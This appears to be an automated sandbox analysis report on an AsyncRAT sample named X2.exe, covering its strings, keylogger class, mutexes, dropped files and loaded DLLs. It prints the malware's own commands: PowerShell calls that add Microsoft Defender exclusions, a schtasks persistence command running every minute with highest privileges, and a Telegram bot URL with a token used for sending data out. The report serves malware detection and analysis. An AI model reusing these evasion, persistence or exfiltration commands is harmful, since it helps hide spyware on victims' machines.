Source: X2.exe, 00000003.00000002.2546617770.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: X2.exe, explorer.exe.3.dr	String found in binary or memory: https://api.telegram.org/bot
Source: X2.exe, 00000003.00000002.2546617770.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=96664
Source: powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1385650086.000001C310070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1501820454.0000016D287CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1679683114.00000196E9E1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: X2.exe, XLogger.cs	.Net Code: KeyboardLayout
Source: explorer.exe.3.dr, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\Desktop\X2.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\X2.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: X2.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.0.X2.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: X2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: X2.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.X2.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: X2.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: X2.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: X2.exe, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: explorer.exe.3.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: explorer.exe.3.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: explorer.exe.3.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: X2.exe, Settings.cs	Base64 encoded string: 'k5WvWmfhLuItqhJM2jMvUmS5snAh/wwlYMXM38QkUNgQ1T0rBrVVH4qgb1jfAlrq', 'OLdN6aYFG6KvcmOxV4s2bJCMvk51aO/muMB6tQPx8Ykx3JJAV7R2DS8HUysRUiZt', 'SG4MOE7EsMcyRe5i9wrWPe6kj6zlXocCGuK27PqYDroBpRzVtPbB0IEzc3WP0maU'
Source: explorer.exe.3.dr, Settings.cs	Base64 encoded string: 'k5WvWmfhLuItqhJM2jMvUmS5snAh/wwlYMXM38QkUNgQ1T0rBrVVH4qgb1jfAlrq', 'OLdN6aYFG6KvcmOxV4s2bJCMvk51aO/muMB6tQPx8Ykx3JJAV7R2DS8HUysRUiZt', 'SG4MOE7EsMcyRe5i9wrWPe6kj6zlXocCGuK27PqYDroBpRzVtPbB0IEzc3WP0maU'

Source: X2.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: X2.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: explorer.exe.3.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: explorer.exe.3.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/21@2/4

Source: C:\Users\user\Desktop\X2.exe

File created: C:\Users\user\AppData\Roaming\explorer.exe

Jump to behavior

Source: C:\Users\user\Desktop\X2.exe	Mutant created: \Sessions\1\BaseNamedObjects\MeDwR8PJidtfrQQa
Source: C:\Users\user\AppData\Roaming\explorer.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_03

Source: C:\Users\user\Desktop\X2.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe

Source: X2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: X2.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\X2.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\X2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: X2.exe	ReversingLabs: Detection: 83%
Source: X2.exe	Virustotal: Detection: 66%

Source: C:\Users\user\Desktop\X2.exe

File read: C:\Users\user\Desktop\X2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\X2.exe "C:\Users\user\Desktop\X2.exe"
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X2.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X2.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"	Jump to behavior

Source: C:\Users\user\Desktop\X2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\X2.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
